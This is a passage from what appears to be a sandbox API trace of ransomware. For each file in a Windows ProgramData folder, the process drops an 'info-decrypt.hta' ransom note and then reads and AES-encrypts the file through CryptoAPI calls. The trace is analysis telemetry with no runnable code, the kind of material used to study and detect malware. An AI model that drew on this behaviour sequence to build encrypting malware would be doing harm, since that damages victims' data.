ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0134.248] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x691f264) returned 1 [0134.248] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\background.png", nBufferLength=0x105, lpBuffer=0x691ee00, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\background.png", lpFilePart=0x0) returned 0x62 [0134.249] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\info-decrypt.hta", nBufferLength=0x105, lpBuffer=0x691eca8, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\info-decrypt.hta", lpFilePart=0x0) returned 0x64 [0134.249] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x691f19c) returned 1 [0134.249] CreateFileW (lpFileName="C:\\ProgramData\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\info-decrypt.hta" (normalized: "c:\\programdata\\microsoft\\device stage\\device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\info-decrypt.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x578 [0134.251] GetFileType (hFile=0x578) returned 0x1 [0134.251] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x691f198) returned 1 [0134.251] GetFileType (hFile=0x578) returned 0x1 [0134.251] WriteFile (in: hFile=0x578, lpBuffer=0x377c140*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x691f260, lpOverlapped=0x0 | out: lpBuffer=0x377c140*, lpNumberOfBytesWritten=0x691f260*=0x1000, lpOverlapped=0x0) returned 1 [0134.253] WriteFile (in: hFile=0x578, lpBuffer=0x377c140*, nNumberOfBytesToWrite=0x55e, lpNumberOfBytesWritten=0x691f234, lpOverlapped=0x0 | out: lpBuffer=0x377c140*, lpNumberOfBytesWritten=0x691f234*=0x55e, lpOverlapped=0x0) returned 1 [0134.253] CloseHandle (hObject=0x578) returned 1 [0134.254] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\background.png", nBufferLength=0x105, lpBuffer=0x691ee08, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\background.png", lpFilePart=0x0) returned 0x62 [0134.254] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x691f2b4) returned 1 [0134.254] GetFileAttributesExW (in: lpFileName="C:\\ProgramData\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\background.png" (normalized: "c:\\programdata\\microsoft\\device stage\\device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\background.png"), fInfoLevelId=0x0, lpFileInformation=0x377d15c | out: lpFileInformation=0x377d15c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5f07a66f, ftCreationTime.dwHighDateTime=0x1ca040c, ftLastAccessTime.dwLowDateTime=0x5f07a66f, ftLastAccessTime.dwHighDateTime=0x1ca040c, ftLastWriteTime.dwLowDateTime=0xc76b3ce5, ftLastWriteTime.dwHighDateTime=0x1c9ea0e, nFileSizeHigh=0x0, nFileSizeLow=0x1fad1)) returned 1 [0134.254] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x691f2b0) returned 1 [0134.254] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\background.png", nBufferLength=0x105, lpBuffer=0x691ecf4, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\background.png", lpFilePart=0x0) returned 0x62 [0134.254] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x691f1e8) returned 1 [0134.254] CreateFileW (lpFileName="C:\\ProgramData\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\background.png" (normalized: "c:\\programdata\\microsoft\\device stage\\device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\background.png"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x578 [0134.255] GetFileType (hFile=0x578) returned 0x1 [0134.255] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x691f1e4) returned 1 [0134.255] GetFileType (hFile=0x578) returned 0x1 [0134.255] GetFileSize (in: hFile=0x578, lpFileSizeHigh=0x691f2f0 | out: lpFileSizeHigh=0x691f2f0*=0x0) returned 0x1fad1 [0134.255] ReadFile (in: hFile=0x578, lpBuffer=0x47df4d0, nNumberOfBytesToRead=0x1fad1, lpNumberOfBytesRead=0x691f29c, lpOverlapped=0x0 | out: lpBuffer=0x47df4d0*, lpNumberOfBytesRead=0x691f29c*=0x1fad1, lpOverlapped=0x0) returned 1 [0134.276] CloseHandle (hObject=0x578) returned 1 [0135.690] CryptAcquireContextW (in: phProv=0x691f23c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x691f23c*=0xbe0718) returned 1 [0138.764] CryptGenRandom (in: hProv=0xbe0718, dwLen=0x10, pbBuffer=0x35c2990 | out: pbBuffer=0x35c2990) returned 1 [0141.115] CryptImportKey (in: hProv=0xbe0718, pbData=0x35cd2ac, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x691f20c | out: phKey=0x691f20c*=0xb7f210) returned 1 [0141.115] CryptContextAddRef (hProv=0xbe0718, pdwReserved=0x0, dwFlags=0x0) returned 1 [0141.115] CryptContextAddRef (hProv=0xbe0718, pdwReserved=0x0, dwFlags=0x0) returned 1 [0141.115] CryptDuplicateKey (in: hKey=0xb7f210, pdwReserved=0x0, dwFlags=0x0, phKey=0x691f1fc | out: phKey=0x691f1fc*=0xb7f250) returned 1 [0141.115] CryptContextAddRef (hProv=0xbe0718, pdwReserved=0x0, dwFlags=0x0) returned 1 [0141.115] CryptSetKeyParam (hKey=0xb7f250, dwParam=0x4, pbData=0x35cd38c*=0x1, dwFlags=0x0) returned 1 [0141.115] CryptSetKeyParam (hKey=0xb7f250, dwParam=0x1, pbData=0x35cd358, dwFlags=0x0) returned 1 [0141.116] CryptEncrypt (in: hKey=0xb7f250, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x47fefc0*, pdwDataLen=0x691f268*=0x1fae0, dwBufLen=0x1fae0 | out: pbData=0x47fefc0*, pdwDataLen=0x691f268*=0x1fae0) returned 1 [0141.118] CryptEncrypt (in: hKey=0xb7f250, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x35cd3b4*, pdwDataLen=0x691f270*=0x0, dwBufLen=0x10 | out: pbData=0x35cd3b4*, pdwDataLen=0x691f270*=0x10) returned 1 [0141.120] CryptDestroyKey (hKey=0xb7f210) returned 1 [0141.120] CryptReleaseContext (hProv=0xbe0718, dwFlags=0x0) returned 1 [0141.120] CryptReleaseContext (hProv=0xbe0718, dwFlags=0x0) returned 1 [0141.120] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\background.png", nBufferLength=0x105, lpBuffer=0x691ece0, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\background.png", lpFilePart=0x0) returned 0x62 [0141.120] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x691f1d4) returned 1 [0141.121] CreateFileW (lpFileName="C:\\ProgramData\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\background.png" (normalized: "c:\\programdata\\microsoft\\device stage\\device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\background.png"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffff [0141.123] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x691e010) returned 1 [0141.123] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\behavior.xml", nBufferLength=0x105, lpBuffer=0x691ee00, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\behavior.xml", lpFilePart=0x0) returned 0x60 [0141.123] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\info-decrypt.hta", nBufferLength=0x105, lpBuffer=0x691ee08, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\info-decrypt.hta", lpFilePart=0x0) returned 0x64 [0141.123] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x691f268) returned 1 [0141.123] GetFileAttributesExW (in: lpFileName="C:\\ProgramData\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\info-decrypt.hta" (normalized: "c:\\programdata\\microsoft\\device stage\\device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\info-decrypt.hta"), fInfoLevelId=0x0, lpFileInformation=0x691f2e4 | out: lpFileInformation=0x691f2e4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xeb14d00, ftCreationTime.dwHighDateTime=0x1d68bad, ftLastAccessTime.dwLowDateTime=0xeb14d00, ftLastAccessTime.dwHighDateTime=0x1d68bad, ftLastWriteTime.dwLowDateTime=0xeb14d00, ftLastWriteTime.dwHighDateTime=0x1d68bad, nFileSizeHigh=0x0, nFileSizeLow=0x155e)) returned 1 [0141.123] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x691f264) returned 1 [0141.123] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\behavior.xml", nBufferLength=0x105, lpBuffer=0x691ee08, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\behavior.xml", lpFilePart=0x0) returned 0x60 [0141.123] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x691f2b4) returned 1 [0141.123] GetFileAttributesExW (in: lpFileName="C:\\ProgramData\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\behavior.xml" (normalized: "c:\\programdata\\microsoft\\device stage\\device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\behavior.xml"), fInfoLevelId=0x0, lpFileInformation=0x35ce468 | out: lpFileInformation=0x35ce468*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc7c5b0d9, ftCreationTime.dwHighDateTime=0x1c9ea0e, ftLastAccessTime.dwLowDateTime=0xc7c5b0d9, ftLastAccessTime.dwHighDateTime=0x1c9ea0e, ftLastWriteTime.dwLowDateTime=0xc7c5b0d9, ftLastWriteTime.dwHighDateTime=0x1c9ea0e, nFileSizeHigh=0x0, nFileSizeLow=0xb61)) returned 1 [0141.420] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x691f2b0) returned 1 [0141.420] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\behavior.xml", nBufferLength=0x105, lpBuffer=0x691ecf4, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\behavior.xml", lpFilePart=0x0) returned 0x60 [0141.420] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x691f1e8) returned 1 [0141.420] CreateFileW (lpFileName="C:\\ProgramData\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\behavior.xml" (normalized: "c:\\programdata\\microsoft\\device stage\\device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\behavior.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x4dc [0141.420] GetFileType (hFile=0x4dc) returned 0x1 [0141.420] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x691f1e4) returned 1 [0141.420] GetFileType (hFile=0x4dc) returned 0x1 [0141.420] GetFileSize (in: hFile=0x4dc, lpFileSizeHigh=0x691f2f0 | out: lpFileSizeHigh=0x691f2f0*=0x0) returned 0xb61 [0141.420] ReadFile (in: hFile=0x4dc, lpBuffer=0x36ef1f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x691f29c, lpOverlapped=0x0 | out: lpBuffer=0x36ef1f8*, lpNumberOfBytesRead=0x691f29c*=0xb61, lpOverlapped=0x0) returned 1 [0141.422] CloseHandle (hObject=0x4dc) returned 1 [0141.422] CryptAcquireContextW (in: phProv=0x691f23c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x691f23c*=0xbdf2e8) returned 1 [0141.423] CryptGenRandom (in: hProv=0xbdf2e8, dwLen=0x10, pbBuffer=0x36f054c | out: pbBuffer=0x36f054c) returned 1 [0143.098] CryptImportKey (in: hProv=0xbdf2e8, pbData=0x35e5dec, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x691f20c | out: phKey=0x691f20c*=0xb7f5d0) returned 1 [0143.099] CryptContextAddRef (hProv=0xbdf2e8, pdwReserved=0x0, dwFlags=0x0) returned 1 [0143.099] CryptContextAddRef (hProv=0xbdf2e8, pdwReserved=0x0, dwFlags=0x0) returned 1 [0143.099] CryptDuplicateKey (in: hKey=0xb7f5d0, pdwReserved=0x0, dwFlags=0x0, phKey=0x691f1fc | out: phKey=0x691f1fc*=0xb7f110) returned 1 [0143.099] CryptContextAddRef (hProv=0xbdf2e8, pdwReserved=0x0, dwFlags=0x0) returned 1 [0143.099] CryptSetKeyParam (hKey=0xb7f110, dwParam=0x4, pbData=0x35e5ecc*=0x1, dwFlags=0x0) returned 1 [0143.099] CryptSetKeyParam (hKey=0xb7f110, dwParam=0x1, pbData=0x35e5e98, dwFlags=0x0) returned 1 [0143.099] CryptEncrypt (in: hKey=0xb7f110, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x35e5edc*, pdwDataLen=0x691f268*=0xb70, dwBufLen=0xb70 | out: pbData=0x35e5edc*, pdwDataLen=0x691f268*=0xb70) returned 1 [0143.099] CryptEncrypt (in: hKey=0xb7f110, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x35e6a70*, pdwDataLen=0x691f270*=0x0, dwBufLen=0x10 | out: pbData=0x35e6a70*, pdwDataLen=0x691f270*=0x10) returned 1 [0143.101] CryptDestroyKey (hKey=0xb7f5d0) returned 1 [0143.101] CryptReleaseContext (hProv=0xbdf2e8, dwFlags=0x0) returned 1 [0143.101] CryptReleaseContext (hProv=0xbdf2e8, dwFlags=0x0) returned 1 [0143.101] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\behavior.xml", nBufferLength=0x105, lpBuffer=0x691ece0, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\behavior.xml", lpFilePart=0x0) returned 0x60 [0143.101] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x691f1d4) returned 1 [0143.101] CreateFileW (lpFileName="C:\\ProgramData\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\behavior.xml" (normalized: "c:\\programdata\\microsoft\\device stage\\device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\behavior.xml"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffff [0143.103] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x691e010) returned 1 [0143.103] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\device.png", nBufferLength=0x105, lpBuffer=0x691ee00, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\device.png", lpFilePart=0x0) returned 0x5e [0143.103] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\info-decrypt.hta", nBufferLength=0x105, lpBuffer=0x691ee08, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\info-decrypt.hta", lpFilePart=0x0) returned 0x64 [0143.103] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x691f268) returned 1 [0143.103] GetFileAttributesExW (in: lpFileName="C:\\ProgramData\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\info-decrypt.hta" (normalized: "c:\\programdata\\microsoft\\device stage\\device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\info-decrypt.hta"), fInfoLevelId=0x0, lpFileInformation=0x691f2e4 | out: lpFileInformation=0x691f2e4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xeb14d00, ftCreationTime.dwHighDateTime=0x1d68bad, ftLastAccessTime.dwLowDateTime=0xeb14d00, ftLastAccessTime.dwHighDateTime=0x1d68bad, ftLastWriteTime.dwLowDateTime=0xeb14d00, ftLastWriteTime.dwHighDateTime=0x1d68bad, nFileSizeHigh=0x0, nFileSizeLow=0x155e)) returned 1 [0143.103] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x691f264) returned 1 [0143.103] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\device.png", nBufferLength=0x105, lpBuffer=0x691ee08, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\device.png", lpFilePart=0x0) returned 0x5e [0143.103] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x691f2b4) returned 1 [0143.104] GetFileAttributesExW (in: lpFileName="C:\\ProgramData\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\device.png" (normalized: "c:\\programdata\\microsoft\\device stage\\device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\device.png"), fInfoLevelId=0x0, lpFileInformation=0x35e7ba0 | out: lpFileInformation=0x35e7ba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5f07a66f, ftCreationTime.dwHighDateTime=0x1ca040c, ftLastAccessTime.dwLowDateTime=0x5f07a66f, ftLastAccessTime.dwHighDateTime=0x1ca040c, ftLastWriteTime.dwLowDateTime=0xc76b3ce5, ftLastWriteTime.dwHighDateTime=0x1c9ea0e, nFileSizeHigh=0x0, nFileSizeLow=0xadc8)) returned 1 [0143.104] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x691f2b0) returned 1 [0143.104] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\device.png", nBufferLength=0x105, lpBuffer=0x691ecf4, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\device.png", lpFilePart=0x0) returned 0x5e [0143.104] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x691f1e8) returned 1 [0143.104] CreateFileW (lpFileName="C:\\ProgramData\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\device.png" (normalized: "c:\\programdata\\microsoft\\device stage\\device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\device.png"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x4dc [0143.104] GetFileType (hFile=0x4dc) returned 0x1 [0143.104] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x691f1e4) returned 1 [0143.104] GetFileType (hFile=0x4dc) returned 0x1 [0143.104] GetFileSize (in: hFile=0x4dc, lpFileSizeHigh=0x691f2f0 | out: lpFileSizeHigh=0x691f2f0*=0x0) returned 0xadc8 [0143.105] ReadFile (in: hFile=0x4dc, lpBuffer=0x35e7e10, nNumberOfBytesToRead=0xadc8, lpNumberOfBytesRead=0x691f29c, lpOverlapped=0x0 | out: lpBuffer=0x35e7e10*, lpNumberOfBytesRead=0x691f29c*=0xadc8, lpOverlapped=0x0) returned 1 [0143.111] CloseHandle (hObject=0x4dc) returned 1 [0143.111] CryptAcquireContextW (in: phProv=0x691f23c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x691f23c*=0xb1dda0) returned 1 [0143.112] CryptGenRandom (in: hProv=0xb1dda0, dwLen=0x10, pbBuffer=0x35f329c | out: pbBuffer=0x35f329c) returned 1 [0145.026] CryptImportKey (in: hProv=0xb1dda0, pbData=0x368b9bc, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x691f20c | out: phKey=0x691f20c*=0xb7f1d0) returned 1 [0145.026] CryptContextAddRef (hProv=0xb1dda0, pdwReserved=0x0, dwFlags=0x0) returned 1 [0145.026] CryptContextAddRef (hProv=0xb1dda0, pdwReserved=0x0, dwFlags=0x0) returned 1 [0145.026] CryptDuplicateKey (in: hKey=0xb7f1d0, pdwReserved=0x0, dwFlags=0x0, phKey=0x691f1fc | out: phKey=0x691f1fc*=0xb7ef90) returned 1 [0145.026] CryptContextAddRef (hProv=0xb1dda0, pdwReserved=0x0, dwFlags=0x0) returned 1 [0145.026] CryptSetKeyParam (hKey=0xb7ef90, dwParam=0x4, pbData=0x368ba9c*=0x1, dwFlags=0x0) returned 1 [0145.026] CryptSetKeyParam (hKey=0xb7ef90, dwParam=0x1, pbData=0x368ba68, dwFlags=0x0) returned 1 [0145.026] CryptEncrypt (in: hKey=0xb7ef90, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x368baac*, pdwDataLen=0x691f268*=0xadd0, dwBufLen=0xadd0 | out: pbData=0x368baac*, pdwDataLen=0x691f268*=0xadd0) returned 1 [0145.027] CryptEncrypt (in: hKey=0xb7ef90, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x36968a0*, pdwDataLen=0x691f270*=0x0, dwBufLen=0x10 | out: pbData=0x36968a0*, pdwDataLen=0x691f270*=0x10) returned 1 [0145.028] CryptDestroyKey (hKey=0xb7f1d0) returned 1 [0145.028] CryptReleaseContext (hProv=0xb1dda0, dwFlags=0x0) returned 1 [0145.028] CryptReleaseContext (hProv=0xb1dda0, dwFlags=0x0) returned 1 [0145.029] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\device.png", nBufferLength=0x105, lpBuffer=0x691ece0, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\device.png", lpFilePart=0x0) returned 0x5e [0145.029] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x691f1d4) returned 1 [0145.029] CreateFileW (lpFileName="C:\\ProgramData\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\device.png" (normalized: "c:\\programdata\\microsoft\\device stage\\device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\device.png"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffff [0145.031] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x691e010) returned 1 [0145.031] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\overlay.png", nBufferLength=0x105, lpBuffer=0x691ee00, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\overlay.png", lpFilePart=0x0) returned 0x5f [0145.031] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\info-decrypt.hta", nBufferLength=0x105, lpBuffer=0x691ee08, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\info-decrypt.hta", lpFilePart=0x0) returned 0x64 [0145.031] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x691f268) returned 1 [0145.031] GetFileAttributesExW (in: lpFileName="C:\\ProgramData\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\info-decrypt.hta" (normalized: "c:\\programdata\\microsoft\\device stage\\device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\info-decrypt.hta"), fInfoLevelId=0x0, lpFileInformation=0x691f2e4 | out: lpFileInformation=0x691f2e4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xeb14d00, ftCreationTime.dwHighDateTime=0x1d68bad, ftLastAccessTime.dwLowDateTime=0xeb14d00, ftLastAccessTime.dwHighDateTime=0x1d68bad, ftLastWriteTime.dwLowDateTime=0xeb14d00, ftLastWriteTime.dwHighDateTime=0x1d68bad, nFileSizeHigh=0x0, nFileSizeLow=0x155e)) returned 1 [0145.031] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x691f264) returned 1 [0145.031] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\overlay.png", nBufferLength=0x105, lpBuffer=0x691ee08, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\overlay.png", lpFilePart=0x0) returned 0x5f [0145.031] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x691f2b4) returned 1 [0145.031] GetFileAttributesExW (in: lpFileName="C:\\ProgramData\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\overlay.png" (normalized: "c:\\programdata\\microsoft\\device stage\\device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\overlay.png"), fInfoLevelId=0x0, lpFileInformation=0x3697860 | out: lpFileInformation=0x3697860*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5f0a07cc, ftCreationTime.dwHighDateTime=0x1ca040c, ftLastAccessTime.dwLowDateTime=0x5f0a07cc, ftLastAccessTime.dwHighDateTime=0x1ca040c, ftLastWriteTime.dwLowDateTime=0xc76d9e43, ftLastWriteTime.dwHighDateTime=0x1c9ea0e, nFileSizeHigh=0x0, nFileSizeLow=0x70c1)) returned 1 [0145.032] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x691f2b0) returned 1 [0145.032] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\overlay.png", nBufferLength=0x105, lpBuffer=0x691ecf4, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\overlay.png", lpFilePart=0x0) returned 0x5f [0145.032] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x691f1e8) returned 1 [0145.032] CreateFileW (lpFileName="C:\\ProgramData\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\overlay.png" (normalized: "c:\\programdata\\microsoft\\device stage\\device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\overlay.png"), dwDesiredAccess=0x80000000, 